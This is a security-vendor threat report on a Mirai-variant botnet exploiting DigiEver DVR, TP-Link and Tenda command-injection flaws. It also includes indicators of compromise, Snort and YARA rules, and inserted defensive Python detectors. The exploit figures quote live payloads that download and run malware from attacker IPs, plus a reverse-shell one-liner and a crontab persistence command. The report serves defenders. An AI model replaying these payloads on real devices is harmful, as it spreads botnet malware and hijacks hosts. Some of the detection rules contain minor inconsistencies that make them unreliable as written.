DIGIEVER FIX THAT IOT THING!

Written by Kyle Lefton, Daniel Messing, and Larry Cashdollar
December 19, 2024

Written by Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.
Written by Daniel Messing

Daniel Messing is a seasoned threat intelligence specialist with more than a decade of experience across public and private sectors. As a Senior Security Researcher on the Security Intelligence Response Team, he has been instrumental in building, enhancing, and scaling global threat intelligence programs both at Akamai and in other organizations. Outside of work, Daniel enjoys reading and playing sports.

Written by Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

EXECUTIVE SUMMARY

* A vulnerability in DigiEver DS-2105 Pro DVRs is being exploited to spread malware.
* The Akamai Security Intelligence Research Team (SIRT) noticed this activity in their honeypots on November 18, 2024.
* The vulnerability was originally discovered by Ta-Lun Yen and a CVE identifier has been requested by the Akamai SIRT.
* The malware is a Mirai variant that has been modified to use improved encryption algorithms.
* We have included a list of indicators of compromise (IoCs) in this blog post to assist in defense against this threat.

CONTENT WARNING: The threat actors responsible for this malware use content naming that may be considered offensive by some. We did not redact them in an effort to increase detection as this campaign is currently active in the wild.
INTRODUCTION AND DISCOVERY

In mid-November 2024, the Akamai SIRT discovered an uptick in activity targeting the URI /cgi-bin/cgi_main.cgi in our global network of honeypots. This activity appears to be part of an ongoing Mirai-based malware campaign dating back to at least October 2024. The vulnerability does not have a CVE assignment at this time, but it appears to have originally been discovered and published by Ta-Lun Yen from TXOne Research. In that publication, he attributed this remote code execution (RCE) vulnerability to multiple DVR devices, including the DigiEver DS-2105 Pro model. Our analysts determined that the exploit attempts we observed were in line with this published vulnerability research.

Further investigation into this campaign revealed a new botnet that calls itself the “Hail Cock Botnet” and has been active since at least September 2024. Using a Mirai malware variant that incorporates ChaCha20 and XOR decryption algorithms, it has been seen compromising vulnerable Internet of Things (IoT) devices in the wild, such as the DigiEver DVR, and TP-Link devices through CVE-2023-1389.

THE VULNERABILITY

The DigiEver DVR vulnerability was discovered by the TXOne researcher after looking into some exposed IP address ranges during penetration testing. Through Shodan queries, he was able to identify many of the IP addresses as historically vulnerable devices, such as DVRs. He emulated the DigiEver DVR firmware and noticed that /cgi-bin/cgi_main.cgi was one of the CGI endpoints (Figure 1).

Fig. 1: Endpoint with suspected vulnerability

Through this endpoint, the researcher was able to achieve RCE (Figure 2).

Fig. 2: RCE confirmed by researcher

ACTIVE EXPLOITATION

The Akamai SIRT noticed that this URI started to be targeted by an unknown threat actor on November 18, 2024. We were able to match the syntax of the payload we observed in our honeypots to the proof of concept (PoC) from the research publication (Figure 3).
```
cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69&ntp=`rm x86;curl --output x86 http://154.216.17[.]126/x86; chmod 777 *; ./x86 nvr`&ntp1=time.stdtime.gov.tw&ntp2=`rm x86;curl --output x86 http://154.216.17[.]126/x86; chmod 777 *; ./x86 nvr`&isEnabled=0&timeDiff=+9&ntpAutoSync=1&ntpSyncMode=1&day=0&hour=0&min=0&syncDiff=30
```

Fig. 3: Payload targeting DigiEver RCE vulnerability (URL decoded)

The vulnerability appears to allow command injection through the ntp parameter. In this example, the injected command reaches out to a remote malware-hosting server to download Mirai-based malware. These sessions arrive as HTTP POST requests over port 80, with “**IP Address**:80/cfg_system_time.htm” as the HTTP Referer header.

In addition to the DigiEver RCE exploit, we also see this botnet targeting other vulnerabilities, such as CVE-2023-1389, affecting TP-Link devices (Figure 4).

```
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://45.202.35[.]24/l+-O-|+sh`) HTTP/1.1
Host: localhost:80
User-Agent: Go-http-client/1.1
```

Fig. 4: Payload targeting CVE-2023-1389

The botnet exploits this command injection vulnerability in the /cgi-bin/luci;stok=/locale endpoint of the TP-Link web management interface to download and execute a malicious shell script. This script in turn downloads the Mirai malware payload and executes it on the target system (Figure 5).

Fig. 5: Contents of the downloaded “l” script from the request above for CVE-2023-1389 (Source: https://ducklingstudio.blog.fc2.com/blog-entry-394.html)

The botnet also targets the Tenda HG6 v3.3.0 remote command injection vulnerability (Figure 6).

```
/boaform/admin/formTracert target_addr=;`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|wget+http://45.202.35[.]24/b+-O-|+sh+>/tmp/f`&waninf=1_INTERNET_R_VID_
```

Fig. 6: Payload targeting Tenda HG6

In addition to these vulnerabilities, we observed this botnet targeting others, such as CVE-2018-17532, affecting Teltonika RUT9XX routers. The exploit downloads and executes a shell script via a wget request, which in turn makes an additional request to download and execute the malware on the target machine (Figure 7).

Fig. 7: Contents of the “b.sh” shell script

THE MALWARE

The malware samples we identified were Mirai-based malware variants distributed for a variety of architectures, including x86, ARM, MIPS, and more. One particularly interesting aspect of these samples was their use of both XOR and ChaCha20 for their decryption algorithm. Some of the strings seen in the dynamic analysis section, such as the console output “you are now apart of hail cock botnet”, could not be found among the human-readable strings of the malware, nor among the XOR-decoded strings.

We found that an independent security researcher in Japan published some interesting findings about this malware. He discovered that the malware was decrypting this string and displaying it on the console, with the string stored in the binary's data segment (Figure 8).

Fig. 8: Decrypting message

Checking where a string is assigned to that output shows the string decryption function (FUN_00408500) and the string location (DAT_005166a0) as an argument. After initializing, the next function is used to process the encrypted string from the second argument and store it in memory (Figure 9).

Fig. 9: Decrypting data sections

When examining the function "FUN_00404960," the researcher discovered that its final step involves an XOR operation. In sections where constants are utilized and converted to ASCII, the function returns the string "expand 32-byte k." This string is a known constant in cryptographic algorithms like Salsa20 and ChaCha20, indicating that the function labeled "FUN_00404960" is responsible for decryption (Figure 10).
Fig. 10: Decrypting with Salsa20 and ChaCha20

Although employing complex decryption methods isn't new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators. This is notable mainly because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release.

From static string analysis, the malware uses many default or common credentials for various devices to spread the botnet to additional hosts. Many new credential pairs have been added to the original ones that shipped with Mirai — including the string “telecomadmin”, for example, which is the default username for the Huawei ONT HG8245H5 fiber termination kit, and the default password for some routers using the Realtek chipset.

SANDBOX DETAILS

By running the malware samples in dynamic sandbox environments, we were able to identify additional IoCs and notable strings from the malware. One such behavior we saw was the creation of a cron job to download and run a shell script from the domain “hailcocks[.]ru” to maintain persistence (Figure 11). It attempts to download the “wget.sh” file from the same server using curl and/or wget to ensure compatibility in case one of them is not installed on the compromised host.

```
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks[.]ru/wget.sh; curl --output wget.sh http://hailcocks[.]ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
```

Fig. 11: Persistence via crontab

Upon execution, the malware connected to a large variety of hosts, consistent with typical Mirai Telnet and SSH brute-forcing behavior. It also connects to a separate single IP address, to which the A records for the domain “kingstonwikkerink[.]dyn” resolve, for command and control (C2) communication. Additionally, hosts that are compromised with this malware will see a unique string printed to the console upon malware execution.
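The two static-analysis observations from the malware section above, the "expand 32-byte k" constant that marks a Salsa20/ChaCha20 routine and the original Mirai string obfuscation that many Mirai descendants still carry, can both be checked mechanically. The script below is an added example and not code from the Akamai post: the byte blobs are constructed, and the XOR scheme and its 0xDEADBEEF key are those of toggle_obf() in the leaked original Mirai source (table.c), not the key of the Hail Cock samples, which the post does not give.

```python
"""Added example, not code from the Akamai post: two static checks for a
Mirai-family sample. (1) Locate the Salsa20/ChaCha20 constant "expand 32-byte k",
either as contiguous text or as the four 32-bit little-endian words a compiler
typically emits as immediates. (2) Undo the string obfuscation of the leaked
original Mirai source (toggle_obf() in table.c), which XORs every byte with each
of the four bytes of a 32-bit key, 0xDEADBEEF in that release. All byte blobs
below are constructed; the real samples' key is not given in the post."""
import struct

SIGMA = b"expand 32-byte k"
# The same constant as four little-endian 32-bit immediates.
SIGMA_WORDS = struct.unpack("<4I", SIGMA)  # (0x61707865, 0x3320646e, 0x79622d32, 0x6b206574)


def _find_all(blob: bytes, needle: bytes) -> list:
    offsets, start = [], 0
    while (i := blob.find(needle, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets


def find_chacha_constants(blob: bytes) -> dict:
    """Offsets of the constant as text, and of each word as a 4-byte LE value.
    A text hit also yields four word hits at consecutive offsets."""
    return {
        "text": _find_all(blob, SIGMA),
        "words": [(hex(w), off) for w in SIGMA_WORDS for off in _find_all(blob, struct.pack("<I", w))],
    }


def looks_like_chacha(blob: bytes) -> bool:
    """True when all four words of the constant occur somewhere in the blob."""
    found = {w for w, _ in find_chacha_constants(blob)["words"]}
    return len(found) == 4


def mirai_xor(data: bytes, key: int = 0xDEADBEEF) -> bytes:
    """Mirai's toggle_obf(): XOR with k1, then k2, k3, k4, i.e. with their XOR
    (0x22 for 0xDEADBEEF). The operation is its own inverse, so it encodes and decodes."""
    k = (key & 0xFF) ^ ((key >> 8) & 0xFF) ^ ((key >> 16) & 0xFF) ^ ((key >> 24) & 0xFF)
    return bytes(b ^ k for b in data)


def recover_strings(blob: bytes, key: int = 0xDEADBEEF, min_len: int = 4) -> list:
    """Decode an obfuscated table and return the printable ASCII runs it contains."""
    out, run = [], bytearray()
    for b in mirai_xor(blob, key) + b"\x00":  # trailing sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(bytes(run))
        run = bytearray()
    return out


# Constructed blobs for this example: filler, the constant as text, then as loose words.
SAMPLE_CODE = (
    b"\x90" * 16 + SIGMA + b"\x00" * 8
    + b"".join(struct.pack("<I", w) + b"\x00\x00" for w in SIGMA_WORDS)
)
# A constructed Mirai-style string table (NUL-terminated entries, each obfuscated).
SAMPLE_TABLE = b"".join(mirai_xor(s + b"\x00") for s in (b"/bin/busybox", b"telecomadmin", b"admin"))

if __name__ == "__main__":
    print(find_chacha_constants(SAMPLE_CODE)["text"], looks_like_chacha(SAMPLE_CODE))
    print(recover_strings(SAMPLE_TABLE))
```

The word-form search matters because an optimising compiler often does not keep the sixteen-byte string intact but loads the four words as immediates; a plain `strings` run then misses the constant, which is exactly why the researcher only recognised it after converting constants in the decompiled function to ASCII. If the XOR decode yields nothing readable, the sample is using a different key or, as here, ChaCha20 for the strings that matter.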
Older versions of the malware will print the string “you are now apart of hail cock botnet” (Figure 12). Newer versions of the malware will print the string “I just wanna look after my cats, man.” to the console instead (Figure 13).

Fig. 12: Older malware console output message

Fig. 13: Newer malware console output message

CONCLUSION

Cybercriminals have consistently leveraged the legacy of the Mirai malware to perpetuate botnet campaigns for years, and the new Hail Cock botnet is no exception. One of the easiest methods for threat actors to compromise new hosts is to target outdated firmware or retired hardware. The DigiEver DS-2105 Pro, which is approximately 10 years old now, is an example. Hardware manufacturers do not always issue patches for retired devices, and the manufacturer itself may sometimes be defunct. Therefore, in circumstances in which security patches are unavailable and unlikely to come, we recommend upgrading vulnerable devices to a newer model.

IOCS

We’ve included a list of IoCs, as well as Snort and Yara rules, to aid defenders.
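Before the rule lists, an added example that is not code from the Akamai post: a request inspector for the exploit pattern from the Active Exploitation section, i.e. a request to /cgi-bin/cgi_main.cgi whose ntp, ntp1 or ntp2 field carries shell metacharacters, arriving with a cfg_system_time.htm Referer. Both requests embedded below are constructed for this example; the addresses are from the 192.0.2.0/24 documentation range, not infrastructure from the campaign.

```python
"""Added example, not code from the Akamai post: flag HTTP requests that match
the DigiEver /cgi-bin/cgi_main.cgi command-injection pattern described above."""
import re
from urllib.parse import parse_qs

# Shell metacharacters and download tools that never belong in an NTP server name.
INJECTION_RE = re.compile(r"`|\$\(|;|\|\|?|&&|\b(?:wget|curl|chmod)\b")

# Form fields that carried the injected command in the observed payload.
WATCHED_PARAMS = ("ntp", "ntp1", "ntp2")
TARGET_URI = "/cgi-bin/cgi_main.cgi"


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_request(raw: str) -> dict:
    """Return {'verdict': 'exploit_attempt' | 'benign', 'reasons': [...]} for one request."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if path.split("?", 1)[0] == TARGET_URI:
        reasons.append("request to " + TARGET_URI)
    # POST bodies are form-encoded; parse_qs percent-decodes and splits on '&'.
    query = body if method == "POST" else path.partition("?")[2]
    params = parse_qs(query, keep_blank_values=True)
    injected = False
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if INJECTION_RE.search(value):
                injected = True
                reasons.append(f"shell metacharacters in {name}={value!r}")
    if "cfg_system_time.htm" in headers.get("referer", ""):
        reasons.append("Referer points at cfg_system_time.htm")
    # Only the injected command decides the verdict; the URI and Referer also occur
    # in legitimate time-zone changes and are reported as supporting context.
    return {"verdict": "exploit_attempt" if injected else "benign", "reasons": reasons}


def count_exploit_attempts(requests) -> int:
    """Number of requests in an iterable that carry an injected command."""
    return sum(1 for r in requests if inspect_request(r)["verdict"] == "exploit_attempt")


# Constructed sample traffic for this example; 192.0.2.0/24 is the documentation range.
EXPLOIT_ATTEMPT = (
    "POST /cgi-bin/cgi_main.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Referer: http://192.0.2.10:80/cfg_system_time.htm\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69"
    "&ntp=%60rm+x86%3Bcurl+--output+x86+http%3A%2F%2F192.0.2.50%2Fx86%3B+chmod+777+*%3B+.%2Fx86+nvr%60"
    "&ntp1=time.stdtime.gov.tw&isEnabled=0&timeDiff=%2B9"
)
LEGITIMATE_CHANGE = (
    "POST /cgi-bin/cgi_main.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Referer: http://192.0.2.10:80/cfg_system_time.htm\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69"
    "&ntp=pool.ntp.org&ntp1=time.stdtime.gov.tw&isEnabled=1&timeDiff=%2B9"
)

if __name__ == "__main__":
    for req in (EXPLOIT_ATTEMPT, LEGITIMATE_CHANGE):
        print(inspect_request(req))
```

Feed it reassembled requests from a honeypot, a reverse proxy or a packet capture; the verdict rests on the parameter content, so a correctly formed time-zone change to the same endpoint with the same Referer stays benign while any backtick, `$(`, `;` or pipe in the NTP fields is reported with the offending value for triage.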
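The crontab persistence from Figure 11 has a host-side counterpart. The following is an added example and not code from the Akamai post: it parses the output of `crontab -l` (a constructed sample is embedded, with the placeholder domain malware.example standing in for any download host) and reports entries that run at reboot, fetch from a remote host, mark the download executable and run it from /tmp.

```python
"""Added example, not code from the Akamai post: a host-side check for the
crontab persistence pattern shown in Figure 11 (an @reboot entry that fetches
a script from a remote host, marks it executable and runs it from /tmp)."""
import re

# A wget/curl invocation followed, within the same shell command, by an http(s) URL;
# the capture group is the remote host.
REMOTE_FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;|&]*https?://([^\s/'\"]+)")
STAGES_IN_TMP_RE = re.compile(r"(?:^|\s)cd\s+/tmp\b|/tmp/")
# chmod that grants execute to "others": +x, or an octal mode whose last digit is odd.
CHMOD_WORLD_EXEC_RE = re.compile(r"chmod\s+(?:a?\+x|[0-7]{0,3}[1357]\b)")
# Executes a file from the working directory, e.g. "; ./wget.sh".
RUNS_LOCAL_FILE_RE = re.compile(r"(?:^|[;&|]\s*)\./\S+")


def split_cron_line(line: str):
    """Return (schedule, command) for an @shorthand or five-field crontab line."""
    if line.startswith("@"):
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)
    if len(parts) < 6:
        return line, ""
    return " ".join(parts[:5]), parts[5]


def analyse_entry(line: str) -> dict:
    """Score one crontab entry against the persistence indicators."""
    schedule, command = split_cron_line(line)
    hosts = sorted(set(REMOTE_FETCH_RE.findall(command)))
    indicators = {
        "runs_at_reboot": schedule == "@reboot",
        "remote_hosts": hosts,
        "stages_in_tmp": bool(STAGES_IN_TMP_RE.search(command)),
        "chmod_world_exec": bool(CHMOD_WORLD_EXEC_RE.search(command)),
        "runs_local_file": bool(RUNS_LOCAL_FILE_RE.search(command)),
    }
    hits = sum(1 for value in indicators.values() if value)
    # A remote fetch plus at least two further indicators is the Figure 11 shape.
    suspicious = bool(hosts) and hits >= 3
    return {"schedule": schedule, "command": command, "suspicious": suspicious, **indicators}


def suspicious_entries(crontab_text: str) -> list:
    """Return the analysed entries from `crontab -l` output that look like Figure 11."""
    results = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:  # environment assignment such as MAILTO=root
            continue
        entry = analyse_entry(line)
        if entry["suspicious"]:
            results.append(entry)
    return results


# Constructed sample of `crontab -l` output; malware.example is a placeholder domain.
CRONTAB_SAMPLE = """\
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /usr/local/bin/start-sensor --config /etc/sensor.yml
@reboot cd /tmp; wget http://malware.example/wget.sh; curl --output wget.sh http://malware.example/wget.sh; chmod 777 wget.sh; ./wget.sh
"""

if __name__ == "__main__":
    for entry in suspicious_entries(CRONTAB_SAMPLE):
        print(entry["schedule"], entry["remote_hosts"], entry["command"])
```

Run it over `crontab -l` for every user (and over the files under /etc/cron.d and /var/spool/cron on a mounted image) during triage of a suspected IoT or Linux compromise; the legitimate @reboot entry in the sample is kept quiet because it fetches nothing, so the check keys on the combination of indicators rather than on @reboot alone.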
SNORT RULES FOR NETWORK IOCS

SNORT RULES FOR C2 IPS

```
alert tcp $HOME_NET any -> 154.216.17.126 any (msg:"C2 Comms for Hail Cock Botnet to 154.216.17.126"; flow:to_server,established;)
alert tcp $HOME_NET any -> 154.213.187.50 any (msg:"C2 Comms for Hail Cock Botnet to 154.213.187.50"; flow:to_server,established;)
alert tcp $HOME_NET any -> 86.107.100.80 any (msg:"C2 Comms for Hail Cock Botnet to 86.107.100.80"; flow:to_server,established;)
alert tcp $HOME_NET any -> 213.182.204.57 any (msg:"C2 Comms for Hail Cock Botnet to 213.182.204.57"; flow:to_server,established;)
alert tcp $HOME_NET any -> 195.133.92.51 any (msg:"C2 Comms for Hail Cock Botnet to 195.133.92.51"; flow:to_server,established;)
alert tcp $HOME_NET any -> 185.82.200.181 any (msg:"C2 Comms for Hail Cock Botnet to 185.82.200.181"; flow:to_server,established;)
alert tcp $HOME_NET any -> 81.29.149.178 any (msg:"C2 Comms for Hail Cock Botnet to 81.29.149.178"; flow:to_server,established;)
alert tcp $HOME_NET any -> 88.151.195.22 any (msg:"C2 Comms for Hail Cock Botnet to 88.151.195.22"; flow:to_server,established;)
alert tcp $HOME_NET any -> 91.149.218.232 any (msg:"C2 Comms for Hail Cock Botnet to 91.149.218.232"; flow:to_server,established;)
alert tcp $HOME_NET any -> 91.149.238.18 any (msg:"C2 Comms for Hail Cock Botnet to 91.149.238.18"; flow:to_server,established;)
alert tcp $HOME_NET any -> 31.13.248.89 any (msg:"C2 Comms for Hail Cock Botnet to 31.13.248.89"; flow:to_server,established;)
alert tcp $HOME_NET any -> 193.233.193.45 any (msg:"C2 Comms for Hail Cock Botnet to 193.233.193.45"; flow:to_server,established;)
alert tcp $HOME_NET any -> 194.87.198.29 any (msg:"C2 Comms for Hail Cock Botnet to 194.87.198.29"; flow:to_server,established;)
alert tcp $HOME_NET any -> 45.202.35.91 any (msg:"C2 Comms for Hail Cock Botnet to 45.202.35.91"; flow:to_server,established;)
alert tcp $HOME_NET any -> 104.37.188.76 any (msg:"C2 Comms for Hail Cock Botnet to 104.37.188.76"; flow:to_server,established;)
alert tcp $HOME_NET any -> 95.214.53.205 any (msg:"C2 Comms for Hail Cock Botnet to 95.214.53.205"; flow:to_server,established;)
alert tcp $HOME_NET any -> 5.35.104.31 any (msg:"C2 Comms for Hail Cock Botnet to 5.35.104.31"; flow:to_server,established;)
alert tcp $HOME_NET any -> 149.50.106.25 any (msg:"C2 Comms for Hail Cock Botnet to 149.50.106.25"; flow:to_server,established;)
alert tcp $HOME_NET any -> 141.98.11.79 any (msg:"C2 Comms for Hail Cock Botnet to 141.98.11.79"; flow:to_server,established;)
alert tcp $HOME_NET any -> 45.202.35.24 any (msg:"C2 Comms for Hail Cock Botnet to 45.202.35.24"; flow:to_server,established;)
alert tcp $HOME_NET any -> 5.39.254.71 any (msg:"C2 Comms for Hail Cock Botnet to 5.39.254.71"; flow:to_server,established;)
alert tcp $HOME_NET any -> 45.126.50.101 any (msg:"C2 Comms for Hail Cock Botnet to 45.126.50.101"; flow:to_server,established;)
```

SNORT RULES FOR C2 DOMAIN RESOLUTION DETECTION

```
alert tcp $HOME_NET any -> hailcocks.ru any (msg:"BLOCK Connection to malicious domain - hailcocks.ru"; flow:to_server,established; sid:1000010; rev:1;)
alert tcp $HOME_NET any -> kingstonwikkerink.dyn any (msg:"BLOCK Connection to malicious domain - kingstonwikkerink.dyn"; flow:to_server,established; sid:1000011; rev:1;)
alert tcp $HOME_NET any -> catvision.dyn any (msg:"BLOCK Connection to malicious domain - catvision.dyn"; flow:to_server,established; sid:1000012; rev:1;)
alert tcp $HOME_NET any -> hikvision.geek any (msg:"BLOCK Connection to malicious domain - hikvision.geek"; flow:to_server,established; sid:1000013; rev:1;)
alert tcp $HOME_NET any -> shitrocket.dyn any (msg:"BLOCK Connection to malicious domain - shitrocket.dyn"; flow:to_server,established; sid:1000014; rev:1;)
alert tcp $HOME_NET any -> catlovingfools.geek any (msg:"BLOCK Connection to malicious domain - catlovingfools.geek"; flow:to_server,established; sid:1000015; rev:1;)
```

YARA RULES FOR MALWARE SAMPLES

```
rule hailcock_malware {
    strings:
        $someoffdeeznuts = "someoffdeeznuts"
        // a dotted-decimal address is a text string, not a hex string, in YARA syntax
        $ip_address = "154.213.187.50"
    condition:
        any of them
}

rule malware_hashes {
    strings:
        $hash_1 = "3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615"
        $hash_2 = "0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad"
        $hash_3 = "b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af"
        $hash_4 = "dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02"
        $hash_5 = "a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41"
    condition:
        any of them
}

rule malicious_domains {
    strings:
        $hailcocks = "hailcocks.ru"
        $kingstonwikkerink = "kingstonwikkerink.dyn"
        $catvision = "catvision.dyn"
        $catloving = "catlovingfools.geek"
        $hikvision = "hikvision.dyn"
        $shitrocket = "shitrocket.dyn"
    condition:
        any of them
}
```

IPV4 ADDRESSES OF HISTORICAL INFRASTRUCTURE

154.216.17.126
154.213.187.50
86.107.100.80
213.182.204.57
195.133.92.51
185.82.200.181
81.29.149.178
88.151.195.22
91.149.218.232
91.149.238.18
31.13.248.89
193.233.193.45
194.87.198.29
45.202.35.91
104.37.188.76
95.214.53.205
5.35.104.31
149.50.106.25
141.98.11.79
45.202.35.24
5.39.254.71
45.125.66.90
91.132.50.181

DOMAINS FOR C2 AND MALWARE DISTRIBUTION ENDPOINTS

hailcocks[.]ru
kingstonwikkerink[.]dyn
catvision[.]dyn
shitrocket[.]dyn
catlovingfools[.]geek
hikvision[.]geek

SHA256 HASHES

3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af
dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02
a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41
31813bb69e10b636c785358ca09d7f91979454dc6fc001f750bf03ad8bde8fe5